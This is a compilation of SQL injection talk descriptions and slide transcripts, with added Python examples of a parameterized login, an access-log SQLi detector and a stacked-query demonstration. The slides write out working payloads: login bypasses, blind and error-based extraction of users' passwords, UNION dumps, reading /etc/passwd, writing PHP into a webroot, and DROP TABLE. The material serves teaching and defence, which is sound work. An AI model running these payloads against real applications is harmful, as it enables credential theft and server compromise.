SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
In this presentation I covered almost all the basic details about SQL Injection, so you can get the best knowledge about SQL Injection (SQLI).
This presentation contains animation, so try it out on a PC.
• What is SQL injection?
• Why is it harmful?
• Types of SQL injection attacks.
• How to identify an SQL injection vulnerability.
• Exploiting SQL injection.
• How to protect web applications from SQL injection.
The most massive crime of identity theft in history was perpetrated in 2007 by exploiting an SQL Injection vulnerability. This issue is one of the most common and most serious threats to web application security. In this presentation, you'll see some common myths busted and you'll get a better understanding of defending against SQL injection.
An overview of techniques for defending against SQL Injection using Python tools. This slide deck was presented at the DC Python Meetup on October 4th, 2011 by Edgar Roman, Sr. Director of Application Development at PBS.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
SQL Injection
Project for lecture "Computer Systems Security"
You can find an SQL injection attack with sqlmap here: http://www.youtube.com/watch?v=wAwUv5dzwLk
It was performed for educational purposes ONLY.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend JavaScript code. We'll also look at how you can build code that detects and blocks intrusion attempts, and a bunch of other tips and tricks to make sure your customer data stays secure.
Protecting Your Web Site From SQL Injection & XSS (skyhawk133)
The UNM Information Architects and the UNM Arts LAB invite you to a presentation by ABQ Web Geeks' own Chris Kenworthy at the UNM SUB this Wednesday the 27th of August.
Chris will be discussing SQL Injection and Cross Site Scripting Vulnerabilities.
These types of attacks against websites are both common and potentially devastating. Chris will bring us up to speed on them and give us some tips on how to prevent them.
Please mark your calendars for Wednesday, August 27 from 10:00 - 11:30 at the UNM Student Union Building, Lobo Rooms A & B.
Topic: Art of Web Backdoor
Speaker: Pichaya Morimoto
Event: 2600 Thailand Meeting #5
Date: September 6, 2013
Video: https://www.youtube.com/watch?v=QIXTPPBfLyI
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
How "·$% developers defeat the web vulnerability scanners - Presentation Transcript
1. How ?¿$·& developers defeat the most famous web vulnerability scanners … or how to recognize old friends. Chema Alonso, Informática64; José Parada, Microsoft Ibérica
2. Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavy Queries
5.- Conclusions
3. 1.- Introduction
4. SQL Injection is still here among us
5. Web Application Security Consortium: Comparison (http://projects.webappsec.org/Web-Application-Security-Statistics): 12.186 sites, 97.554 bugs
6. Need to Improve Automatic Scanning
A manual scan is not always possible:
Time
Confidentiality
Money, money, money…
We need to study new ways to recognize old-fashioned vulnerabilities in order to improve automatic scanning tools.
7. 2.- Inverted Queries
9. Homers, how are they?
Lazy
Badly trained
Poor experience in security stuff
Don't like working
Don't like computing
Don't like coding
Don't like you!
10. Flanders are left-handed
11. Right
SELECT UID
FROM USERS
WHERE NAME='V_NAME'
AND
PASSWORD='V_PASSW';
12. Wrong?
SELECT UID
FROM USERS
WHERE 'V_NAME'=NAME AND
'V_PASSW'=PASSWORD
13. Login Inverted Query
Select uid
From users where 'v_name'=name and 'v_pass'=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica' or '1'='1
Select uid
From users where 'Robert'=name and 'Kubica' or '1'='1'=password
FAIL
14. Login Inverted SQL Injection: an example
Select uid
From users where 'v_name'=name and 'v_pass'=password
http://www.web.com/login.php?v_name=Robert&v_pass='='' or '1'='1' or 'Kubica
Select uid
From users where 'Robert'=name and ''='' or '1'='1' or 'Kubica'=password
Success
15. Blind Attacks
The attacker injects code but can't access the data directly.
However, this injection changes the behavior of the web application.
The attacker then looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
Blind SQL Injection
Blind XPath Injection
Blind LDAP Injection
16. Blind SQL Injection Attacks
Attacker injects:
"True where clauses"
"False where clauses"
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2
The program doesn't return any visible data from the database, nor data in error messages.
The attacker can't see any data extracted from the database.
17. Blind SQL Injection Attacks
The attacker analyzes the response pages looking for differences between the "True-Answer Page" and the "False-Answer Page":
Different hashes
Different HTML structure
Different patterns (keywords)
Different linear ASCII sums
"Different behavior"
For example: response time
18. Blind SQL Injection Attacks
If any difference exists, then:
The attacker can extract all information from the database
How? Using "booleanization"
MySQL:
Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
"True-Answer Page" or "False-Answer Page"?
MSSQL:
Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
Oracle:
Program.php?id=1 and 100>(Select ASCII(Sub
Mike Creuzer's presentation from the December, 2009 Suburban Chicago PHP & Web Dev Meetup. The topic is SQL injection in PHP and common PHP content management systems.
Visit Mike's blog at http://mike.creuzer.com/
In this lecture you will study:
Google Dorks
Types of Google Dorks
SQL injection
Types of SQL injection
Defending against SQL injection
GOOGLE DORKS
inurl
intitle
allintitle
allinurl
filetype or ext
allintext
intext
SQL INJECTION
What are injection attacks?
How SQL Injection Works
Exploiting SQL Injection Bugs
Mitigating SQL Injection
Defending against Injection Attacks
4. What is SQL Injection
"A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application."
- https://www.owasp.org/index.php/SQL_Injection
[Diagram: application users, via client programs, inject specially crafted SQL as input at the input entry points (search box, forms, article ID, session ID, HTTP headers etc.) of the web application, which passes it on to the database, in order to manipulate the results.]
6. Impact of SQL Injection
In general, consider SQL Injection a high-severity impact.
Technical Impacts:
★ Data losses
★ Bypass authentication
★ Denial of access
★ Lead to host takeover
Business Impacts:
★ All data could be stolen, modified, or deleted.
★ Could your reputation be harmed?
* https://www.owasp.org/index.php/Top_10_2013-A1-Injection
* https://www.owasp.org/index.php/SQL_Injection
7. Exploitation Complexity
Easy: 95%
Very Hard (requires an expert): 4% (maze queries, 2nd order, blind, complex app logic, bypass filters/WAF etc.)
Lunatic: 1%
SQL injection with Havij by a 3 year old
8. A Ton of Tools
★ Automated SQL injection tools
SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, BobCat, bSQLHacker, bSQLbf, Absinthe, SQLBrute, Squeeza, SQL Power Injector etc.
★ Web vulnerability scanners
○ Commercial
Acunetix, Netsparker, IBM AppScan, HP Fortify, HP WebInspect, BurpSuite Pro, Qualys WAS etc.
○ Free
W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
11. Tools are there, so why learn to SQLi?
1. When tools fail to exploit
2. False positives
★ Complex database query
★ Complex application logic
★ Encodings & blacklist filters
★ Post-authenticated
★ Anti-CSRF token
★ Non-SELECT statements
★ Programmer is so indy
3. It's just fun, and sometimes can make good money...
In case you are a penetration tester, or just a zero-day hunter ;)
Popular websites have already been scanned by those available tools.
It is a real challenge to find the flaws that the tools overlooked.
12. Quote from a Hacker
"A good hacker is not one who has hacked 1,000 websites, but one who can hack the same website 1,000 times, after it has been patched every time."
(ตาเล็ก Windows98SE)
14. Boolean-based blind technique
★ Inject an SQL string to control the result to be TRUE or FALSE using boolean algebra
★ You can determine whether T/F based on analysis of the HTTP responses (string/regex/page length/HTTP status)
★ Retrieve arbitrary data:
○ Sub-queries with "SELECT" + conditions (CASE-WHEN, IF-THEN)
15. Example of Vulnerable Code
[Diagram: the user input TITLE is inserted into the SQL query. TRUE case: title = naruto; FALSE case: title = abc123]
16. Boolean-based blind : Probe
★ title = naruto
SQL : SELECT * FROM bookshop WHERE title='naruto'
Result : found (TRUE)
★ title = abc123
SQL : SELECT * FROM bookshop WHERE title='abc123'
Result : not found (FALSE)
★ title = naruto' and '1'='1
SQL : ..WHERE title='naruto' and '1'='1'
Result : found (TRUE)
★ title = naruto' and 1=2-- -
SQL : ..WHERE title='naruto' and 1=2-- -'
Result : not found (FALSE)
Another condition is inserted, connected with the 'AND' operator: T & T = T, T & F = F.
MySQL comments: -- - , # , /**/
17. Boolean-based blind : Exploit
★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- -
Result: found (TRUE)
★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- -
Result: not found (FALSE)
★ title=naruto' and 'cat'=(if(database()='owasp_db','cat','dog'))-- -
Result: found (TRUE)
★ title=naruto' and 'cat'=(if(mid(database(),1,1)='a','cat','dog'))-- -
Result: not found (does not start with 'a') … b … c ...
★ title=naruto' and 'cat'=(if(mid(database(),1,1)='o','cat','dog'))-- -
Result: found (starts with 'o'), then go to the next character.
MySQL IF function: IF(<condition>, <return when TRUE>, <return when FALSE>)
MySQL substring functions:
1. SUBSTRING(str, pos, len)
2. SUBSTR(str, pos, len)
3. MID(str, pos, len)
18. Example of Vulnerable Code
$email=$_POST['email'];
$password=$_POST['password'];
// unvalidated user input is concatenated straight into the SQL string
$sql="SELECT * FROM users WHERE (email='$email')";
$sql.=" AND (password='$password')";
$result = mysql_query($sql);
if(mysql_num_rows($result)){
    die(header('location: member.php'));
}else{
    die(header('HTTP/1.0 401 Unauthorized'));
}
Unvalidated user input: $email and $password.
True (login successful): HTTP/1.1 302 Found, location: member.php
False (login failed): HTTP/1.0 401 Unauthorized
Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1"
… WHERE (email='a') AND (password='')||(2>'1')
Always TRUE
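The login above and the "inverted query" login from the Chema Alonso transcript earlier on this page are two shapes of the same defect, and the remedy for both is the same. The following Python example is added here and is not code from the slides or from either presentation: it builds a constructed in-memory SQLite users table, runs the page's own payloads against both vulnerable query shapes, and shows a hardened login (email as a bound parameter, password verified in application code against a stored hash with a constant-time compare) treating the same inputs as nothing more than wrong passwords. One caveat a practitioner should know: SQLite reads `||` as string concatenation rather than OR, so the slide's `')||(2>'1` payload is written here in the equivalent `') or ('1'='1` form; the table, salt and user are constructed for the example.

```python
import hashlib
import hmac
import sqlite3

# Constructed sample data: one user. The plaintext column mirrors the slides'
# schema so the vulnerable queries behave as shown; the hash column is what the
# hardened login uses.
SALT = b"constructed-demo-salt"
USERS = [("robert@example.test", "Robert", "Kubica")]


def password_hash(password: str) -> str:
    return hashlib.sha256(SALT + password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (uid INTEGER PRIMARY KEY, email TEXT, name TEXT,"
        " password TEXT, password_hash TEXT)"
    )
    for email, name, pw in USERS:
        con.execute(
            "INSERT INTO users (email, name, password, password_hash) VALUES (?, ?, ?, ?)",
            (email, name, pw, password_hash(pw)),
        )
    return con


def login_concat(con, email: str, password: str) -> bool:
    """Slide 18 shape: both inputs are pasted into the SQL text (vulnerable)."""
    sql = f"SELECT * FROM users WHERE (email='{email}') AND (password='{password}')"
    return con.execute(sql).fetchone() is not None


def login_inverted(con, name: str, password: str) -> bool:
    """'Inverted query' shape from the Chema Alonso slides: literal on the left (vulnerable)."""
    sql = f"SELECT uid FROM users WHERE '{name}'=name AND '{password}'=password"
    return con.execute(sql).fetchone() is not None


def login_safe(con, email: str, password: str) -> bool:
    """Hardened: the email is a bound parameter, so its text is never parsed as SQL,
    and the password is checked in application code against the stored hash."""
    row = con.execute("SELECT password_hash FROM users WHERE email=?", (email,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], password_hash(password))


def run_checks() -> dict:
    """Each value answers: did the login succeed with that input?"""
    con = make_db()
    bypass = "') or ('1'='1"                        # slide 18 payload, OR spelled out for SQLite
    scanner_payload = "Kubica' or '1'='1"           # the generic payload scanners send (slide 13)
    inverted_payload = "'='' or '1'='1' or 'Kubica" # the rearranged payload from slide 14
    return {
        "concat_with_bypass": login_concat(con, "a", bypass),
        "safe_with_bypass": login_safe(con, "a", bypass),
        "safe_with_bypass_and_real_email": login_safe(con, "robert@example.test", bypass),
        "safe_with_real_password": login_safe(con, "robert@example.test", "Kubica"),
        "inverted_with_scanner_payload": login_inverted(con, "Robert", scanner_payload),
        "inverted_with_rearranged_payload": login_inverted(con, "Robert", inverted_payload),
        "safe_with_inverted_payload": login_safe(con, "Robert", inverted_payload),
    }


if __name__ == "__main__":
    for check, outcome in run_checks().items():
        print(f"{check}: {outcome}")
```

The inverted-query results are the point the Chema Alonso slides make about scanners: the generic payload yields `'Kubica' or '1'='1'=password`, which is false, so a tool that only sends that payload reports the inverted login as safe, while the rearranged payload succeeds. The parameterized login does not care which way round the comparison is written, because the input never reaches the SQL parser.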
19. Boolean-based blind : Exploit
Char Pos : 1 (from the first record of the password column)
password=1' or 2>(if(mid((select password from users),1,1)='a',1,3))-- -
HTTP/1.0 401 Unauthorized
password=1' or 2>(if(mid((select password from users),1,1)='b',1,3))-- -
HTTP/1.0 401 Unauthorized
...
password=1' or 2>(if(mid((select password from users),1,1)='t',1,3))-- -
HTTP/1.1 302 Found
location: member.php
If char pos 1 equals 'a' then return 1, otherwise return 3.
When the result is the TRUE case, that means the 1st char is the current value ('t').
20. Boolean-based blind : Exploit
password=1' or 2>(if(mid((select password from users),2,1)='a',1,3))-- -
HTTP/1.0 401 Unauthorized
Go to the next character. Repeat the steps until you get all the text from the results!
Tip: Find length(<query>)
21. Boolean-based blind : Exploit
Looking for an automated way? If the flaw is not too complicated, then we can just switch to SQLMap.
But keep in mind, there are A LOT of tricky patterns that tools cannot figure out how to evaluate as TRUE or FALSE, so just write your own script!
Faster blind test algorithms:
★ Bisection algorithm (binary search)
★ Bit-shift algorithm
★ Regular expression search
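The response-difference probing described in slides 14 to 21 leaves a recognisable trail on the server: many requests from one client to one endpoint whose parameter values carry SQL fragments and differ only in the appended condition. The following Python example is added here and is not code from the slides: it parses constructed Apache combined-format access-log lines, URL-decodes each query parameter, matches the value against patterns derived from the payloads on this page (boolean tautologies, IF/MID, UNION SELECT, extractvalue, sleep, load_file/into outfile, comment terminators) and flags a client that repeats such probes against the same parameter. The log lines, addresses and the threshold of three hits are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines (documentation-range addresses):
# 203.0.113.5 replays the probes from slides 16-17 against searchbook.php,
# 198.51.100.7 is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Sep/2013:10:00:01 +0700] "GET /searchbook.php?title=naruto HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Sep/2013:10:00:02 +0700] "GET /searchbook.php?title=naruto%27+and+%271%27%3D%271 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Sep/2013:10:00:03 +0700] "GET /searchbook.php?title=naruto%27+and+1%3D2--+- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Sep/2013:10:00:04 +0700] "GET /searchbook.php?title=naruto%27+and+%27cat%27%3D(if(mid(database(),1,1)%3D%27a%27,%27cat%27,%27dog%27))--+- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Sep/2013:10:00:05 +0700] "GET /searchbook.php?title=naruto%27+and+%27cat%27%3D(if(mid(database(),1,1)%3D%27o%27,%27cat%27,%27dog%27))--+- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Sep/2013:10:01:00 +0700] "GET /searchbook.php?title=one+piece HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Sep/2013:10:01:30 +0700] "GET /showbook.php?author=longcat HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
"""

# One pattern per technique shown on the page, applied to the decoded parameter value.
SQLI_PATTERNS = [
    (re.compile(r"'\s*(and|or)\s+'?\d+'?\s*=\s*'?\d+", re.I), "boolean tautology/contradiction"),
    (re.compile(r"\b(if|iif|case)\s*\(", re.I), "conditional function"),
    (re.compile(r"\b(mid|substr|substring)\s*\(", re.I), "substring function"),
    (re.compile(r"\bunion\s+(all\s+)?select\b", re.I), "UNION SELECT"),
    (re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I), "error-based function"),
    (re.compile(r"\b(sleep|benchmark)\s*\(", re.I), "time delay"),
    (re.compile(r"\bload_file\s*\(|\binto\s+outfile\b", re.I), "file access"),
    (re.compile(r"--\s|/\*"), "SQL comment terminator"),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def scan_log(text: str) -> list:
    """One finding per (request, parameter) whose decoded value matches a pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # parse_qsl undoes the %xx and '+' encoding, which is what the signatures need
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = [label for pattern, label in SQLI_PATTERNS if pattern.search(value)]
            if reasons:
                findings.append({"ip": m.group("ip"), "path": url.path,
                                 "param": param, "value": value, "reasons": reasons})
    return findings


def summarize(findings: list, threshold: int = 3) -> dict:
    """Group findings per client, endpoint and parameter. Repeated hits against the same
    parameter are the signature of a boolean/blind probing loop rather than a one-off."""
    groups = defaultdict(list)
    for f in findings:
        groups[(f["ip"], f["path"], f["param"])].append(f)
    return {
        key: {
            "hits": len(hits),
            "techniques": sorted({r for h in hits for r in h["reasons"]}),
            "likely_blind_probe": len(hits) >= threshold,
        }
        for key, hits in groups.items()
    }


if __name__ == "__main__":
    for (ip, path, param), info in summarize(scan_log(SAMPLE_LOG)).items():
        print(ip, path, param, info)
```

The per-parameter grouping is what separates a probing loop from a single odd request: slide 17's character-by-character extraction needs dozens of near-identical requests to the same parameter, and that repetition is visible in the log even when each individual request returned 200 and looked like a valid search.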
22. Error-based : Concept
★ Inject specially crafted invalid SQL syntax
★ Ideally, force the web application to expose an error message which contains the injection results
★ Methods depend solely on the DBMS
★ Rarely found in production web apps
23. Example of Vulnerable Code
function search_book($title){
    global $con;
    $sql = "SELECT * FROM bookshop WHERE title='".$title."'";
    // shows the database error message when the query results in an error
    $result = mysql_query($sql) or die(mysql_error($con));
    if(mysql_num_rows($result)){
        return 'found';
    }else{
        return 'not found';
    }
}
$book_title = $_GET['title'];
$book_status = search_book($book_title);
echo '<h1>Result: '.$book_status.'</h1>';
25. Error-based : Exploit
http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat_ws(0x3a,email,password) from users limit 2,1)))-- -
Caution: error messages have a limit on the allowed length. So what? length() + mid() ;)
26. Time-based blind : Concept
★ Inject a valid SQL string to
○ wait a few seconds in TRUE conditions and …
○ a longer/shorter delay for FALSE
★ Analyze the response time to determine the result of the queries
★ Takes a long time to get results, but very useful for hacking completely blind flaws
29. Time-based blind : Exploit
Write a script to automate the attack!
For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
31. UNION query-based : Concept
★ Most popular method found in SQL injection tutorials from Google/YouTube
★ Inject a valid SQL string by making the left-side SELECT false and then inserting "UNION" with another right-side SELECT query, using the same number of columns, containing what you want to fetch.
33. UNION query-based : Exploit
Step 1 : Find the columns of the left SELECT statement using 'ORDER BY'
http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- -
There are columns no. 1 - 4 in the underlying SELECT query. There is no 5th column; if the DB error message is on, you will see:
Unknown column '5' in 'order clause'
34. UNION query-based : Exploit
Step 2.1 : We do not need the result from the 1st SELECT SQL query, so discard it with an 'always FALSE' condition.
http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- -
Step 2.2 : Insert a 2nd SELECT SQL query separated by UNION
http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 UNION select 1,2,3,4-- -
The result of "SELECT 1,2,3,4" will replace where the result of the 1st SELECT was.
35. UNION query-based : Exploit
Exploit : http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 union select user(),database(),version(),(select group_concat(email,password) from users)--+-
Tips: Database Meta Data
select database()
select table_name from information_schema.tables
select column_name from information_schema.columns
36. Stacked Queries : Concept
★ Append another query to the injection
★ Not all DBMS drivers/APIs support stacked queries
★ Very effective for MS-SQL, SQLite
Attack scenario:
User Input = 123
SQL: SELECT email FROM users where id=123
User Input = 456; DROP table users
SQL: ... users where id=456; DROP table users
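Whether the second statement in the scenario above actually runs depends on which database API the application calls, which is what the second bullet is getting at. The following Python example is added here and is not code from the slides: against a constructed in-memory SQLite table it shows that sqlite3's `execute()` refuses a second statement, that `executescript()` runs the whole `456; DROP table users` input, and that the driver's one-statement rule is no defence anyway, because a non-stacked injection (a constructed `456 or 1=1`) still passes through `execute()` when the input is concatenated. Only the bound-parameter lookup, with an integer check on the id, is unaffected by either input.

```python
import sqlite3

PAYLOAD = "456; DROP table users"   # stacked-query input from the slide
TAUTOLOGY = "456 or 1=1"            # constructed non-stacked injection for comparison


def make_db() -> sqlite3.Connection:
    """Constructed users table in the shape of the slide's SELECT."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [(123, "a@example.test"), (456, "b@example.test")])
    con.commit()
    return con


def table_exists(con) -> bool:
    row = con.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='users'").fetchone()
    return row[0] == 1


def lookup_execute_concat(con, user_input: str):
    """Concatenation through execute(): returns (rows, error). sqlite3 prepares exactly
    one statement, so a stacked second statement is rejected (sqlite3.Warning on older
    Python versions, ProgrammingError on newer ones)."""
    try:
        rows = con.execute("SELECT email FROM users where id=" + user_input).fetchall()
        return rows, None
    except (sqlite3.Warning, sqlite3.ProgrammingError) as exc:
        return None, str(exc)


def lookup_executescript_concat(con, user_input: str) -> None:
    """Concatenation through executescript(): the whole script runs, stacked statements included."""
    con.executescript("SELECT email FROM users where id=" + user_input)


def lookup_safe(con, user_input: str) -> list:
    """Bound parameter plus a type check: the input is only ever a value, never SQL text."""
    try:
        user_id = int(user_input)
    except ValueError:
        return []                      # not an integer id: reject instead of querying
    return con.execute("SELECT email FROM users where id=?", (user_id,)).fetchall()


def run_demo() -> dict:
    out = {}
    con = make_db()
    rows, err = lookup_execute_concat(con, PAYLOAD)
    out["execute_refused_stack"] = err is not None and table_exists(con)
    rows, err = lookup_execute_concat(con, TAUTOLOGY)
    out["execute_still_injectable"] = err is None and len(rows) == 2

    con = make_db()
    lookup_executescript_concat(con, PAYLOAD)
    out["executescript_dropped_table"] = not table_exists(con)

    con = make_db()
    out["safe_rows_for_payload"] = lookup_safe(con, PAYLOAD)
    out["safe_rows_for_tautology"] = lookup_safe(con, TAUTOLOGY)
    out["safe_rows_for_id"] = lookup_safe(con, "456")
    out["safe_table_intact"] = table_exists(con)
    return out


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The lesson for code review is that "our driver does not support stacked queries" only removes the DROP from the scenario; the same concatenated string is still an injection point for every other technique on this page, and a multi-statement API such as `executescript()` (or its equivalent in another driver) must never see user-supplied text at all.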
39. Privilege Escalation
★ Read credential from configuration files
★ Create Accessible Web Backdoor
★ Arbitrary OS command execution
40. SQL Injection : Read File
Exploit: http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
41. SQL Injection : Write File
Exploit: http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 union select 0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile '/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
42. SQL Injection : OS CMD Shell
1. Write File > Web Backdoor (ex. http://youtube.com/watch?v=QIXTPPBfLyI)
2. Built-in OS command functions / UDF
MS-SQL xp_cmdshell
43. Advanced Attacks
★ MySQL Second Order SQL Injection
★ Abusing PHP PDO prepared statements
★ Making a Backdoor with SQLite
★ How a hashed string causes SQL Injection flaw
★ Account Takeover with SQL Truncation Attack
★ CodeIgniter Active Record Bypass